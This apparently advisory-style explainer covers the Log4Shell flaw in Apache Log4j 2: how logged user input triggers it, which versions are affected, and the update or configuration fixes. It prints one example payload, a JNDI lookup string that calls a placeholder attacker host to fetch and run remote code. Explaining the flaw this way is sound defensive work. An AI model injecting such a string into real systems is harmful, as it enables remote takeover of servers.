What is Log4j, why is everyone talking about it, and what do you need to do NOW?
What is Log4Shell? Why is it important?
Log4Shell as a concept is much easier to explain when you don’t need to identify where this (nearly ubiquitous) library has been used in a given app or service.
At a high level, Log4Shell is a vulnerability in Log4j, a Java library for adding logging capabilities to Java web and desktop applications. It is managed by the Apache Software Foundation, meaning it is included in most of its software. The association also has a “stamp of high-quality code” that most enterprise software developers favor. This vulnerability - which has been appearing in headlines across the news - allows an attacker to remotely take over control of a device on the internet if the said device is running specific versions of Log4j 2.
The earliest evidence we’ve found so far of the Log4J exploit is 2021-12-01 04:36:50 UTC. This suggests it was in the wild for at least nine days before being publicly disclosed. However, we don’t see evidence of mass exploitation until after public disclosure.
The vulnerability occurs in applications where user input can create a log entry. For example, in applications with input fields, users can control the text entered inside the log file. The idea is that an attacker can create something like: ${jndi:ldap://attacker.com/script}
When the Log4j library writes and parses this entry inside a log, the Java Naming and Directory Interface (JNDI) prefix forces it to connect to the attacker’s domain and run a script stored there.
IT staff of almost all major companies and software providers are now checking their enterprise software that makes use of the Vulnerable Log4j library.
Anyone who has used Log4J between 2.10.0 and 2.14.x is susceptible to attacks.
What can you do NOW?
Option 1: Update
The Apache Software Foundation has released a security update on Friday, December 10th, 2021, for Log4j 2.15.0, fixing the attack vector.
Option 2: Do not update, Config Change
Change the setting for the log4j2.formatMsgNoLookups option to true in the Log4j config also prevents exploitation if companies can’t update.